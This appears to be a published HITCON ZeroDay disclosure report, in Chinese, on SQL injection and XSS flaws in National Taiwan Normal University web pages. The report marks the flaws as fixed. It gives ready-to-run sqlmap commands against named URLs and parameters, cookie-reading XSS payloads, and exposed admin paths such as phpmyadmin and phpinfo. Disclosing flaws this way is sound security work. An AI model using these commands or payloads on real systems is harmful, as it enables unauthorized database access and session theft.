Vulnerability Overview

ZDID: ZD-2022-00876
發信 Vendor: 國立臺灣師範大學
Title: 台灣師範大學網站存在 SQL injection 與 XSS
Introduction: 網站存在 XSS 與 SQL injection

處理狀態

目前狀態

公開

Last Update : 2022/12/16

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2022/10/17 00:42:33 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 00:45:08 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 00:59:51 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 01:03:55 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 01:06:15 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 01:08:01 : 新提交 (由 BTtea 更新此狀態)
2022/10/17 01:11:52 : 新提交 (由 BTtea 更新此狀態)
2022/10/19 14:34:16 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:23:27 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:23:27 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/10/19 17:23:27 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/12/09 13:57:19 : 複測申請中 (由組織帳號更新此狀態)
2022/12/12 14:33:36 : 確認已修補 (由 BTtea 更新此狀態)
2022/12/16 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2022-00876
通報者：blacktea_player (BTtea)
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

使用工具 SQLmap 輔助測試

(以下若使用SQLmap工具進行注入時有中斷問題，請去除 --batch 參數後進行注入，遇到詢問連線異常是否繼續測試的訊息請選擇 y )

站點 https://pr.ntnu.edu.tw/ntnunews/index.php (國立臺灣師範大學秘書室公共事務中心)

https://pr.ntnu.edu.tw/ntnunews/index.php?mode=data&id=20803&type_id=74
GET 參數 id 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://pr.ntnu.edu.tw/ntnunews/index.php?mode=data&id=20803&type_id=74" -p id --technique BU --dbs --batch

站點 https://www.phy.ntnu.edu.tw/demolab/phpBB/index.php (臺灣師範大學物理系物理教學示範實驗教室)

https://www.phy.ntnu.edu.tw/demolab/phpBB/search.php
post : term=物理研究所&sortby=p.post_time+desc&searchboth=both&debug=&submit=%B7j%B4M&sday=5&unanswered=&group=&forum=all
POST 參數 term 存在 XSS 與 SQL injection
xss payload :

'><script>alert(document.cookie)</script>

SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/search.php" --data "term=物理研究所&sortby=p.post_time+desc&searchboth=both&debug=&submit=%B7j%B4M&sday=5&unanswered=&group=&forum=all" -p term --technique TU --dbs --batch

由於有些注入類型時間較久，為了方便以及不造成伺服器負擔，至此以下開始，我這裡僅放出每個參數弱點注入類型截圖，不含注入出資料庫的結果

https://www.phy.ntnu.edu.tw/demolab/phpBB/login.php
post : user=guest&passwd=123&submit=%B0e%A5X
POST 參數 user 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/login.php" --data "user=guest&passwd=123&submit=%B0e%A5X" -p user --technique T --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/sendpassword.php
post : user=123&email=123&submit=%B1H%B0e%B1K%BDX
POST 參數 user 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/sendpassword.php" --data "user=123&email=123&submit=%B1H%B0e%B1K%BDX" -p user --technique T --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=122
GET 參數 forum 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=122" --technique BU --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=1&viewdomain=3
GET 參數 viewdomain 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=1&viewdomain=3" -p viewdomain --technique B --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=122&sortitem=topic_views
GET 參數 sortitem 存在 SQL injection
SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/viewforum.php?forum=122&sortitem=topic_views" -p sortitem --technique BT --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/phy_translation.php
post : eword=information&cmd=%AD%5E%C2%BD%A4%A4&cword=&related=1
POST 參數 eword 存在 XSS 與 SQL injection
xss payload :

"><script>alert(document.cookie)</script>

SQLmap 工具測試參數 : python3 sqlmap.py --random-agent -u "https://www.phy.ntnu.edu.tw/demolab/phpBB/phy_translation.php" --data "eword=information&cmd=%AD%5E%C2%BD%A4%A4&cword=&related=1" -p eword --technique TU --dbs --batch

https://www.phy.ntnu.edu.tw/demolab/phpBB/search.php?advanced=1&term=物理研究所物理研究所&sday=5
GET 參數 sday 存在 XSS
xss payload :

'><script>alert(document.cookie)</script>

https://www.phy.ntnu.edu.tw/demolab/phpBB/search.php
post : term=物理研究所&sortby=p.post_time+desc&searchboth=both&debug=&submit=%B7j%B4M&sday=5&unanswered=&group=&forum=all
POST 參數 debug , unanswered , group 存在 XSS
xss payload :

"><script>alert(document.cookie)</script>

https://www.phy.ntnu.edu.tw/demolab/flash/index.php
post : width=460&height=80&bgcolor=C8DFD0&send=send
POST 參數 width , height , bgcolor 存在 XSS
xss payload :

"><script>alert(document.domain)</script>

https://www.phy.ntnu.edu.tw/demolab/demolab.php
post : level=1&ids=10&path0=&pass=1&keyword=123&cmd=
POST 參數 level , ids , keyword 存在 XSS
xss payload :

level : '><script>alert(document.domain)</script>
ids : '><script>alert(document.domain)</script>  ,  ;alert(document.domain)//  ,  </script><script>alert(document.domain)</script>
keyword : '><script>alert(document.domain)</script>

無意義但不應該被存取的站點目錄可能導致資訊洩漏

網站根目錄底下
https://www.phy.ntnu.edu.tw/data/
https://www.phy.ntnu.edu.tw/demo/
https://www.phy.ntnu.edu.tw/info.php (phpinfo 資訊)
https://www.phy.ntnu.edu.tw/mysqladmin (phpmyadmin)

demolab 目錄底下
https://www.phy.ntnu.edu.tw/demolab/html.php
https://www.phy.ntnu.edu.tw/demolab/check
https://www.phy.ntnu.edu.tw/demolab/content.html
https://www.phy.ntnu.edu.tw/demolab/flash/index.php
https://www.phy.ntnu.edu.tw/demolab/inc/
https://www.phy.ntnu.edu.tw/demolab/mysql.php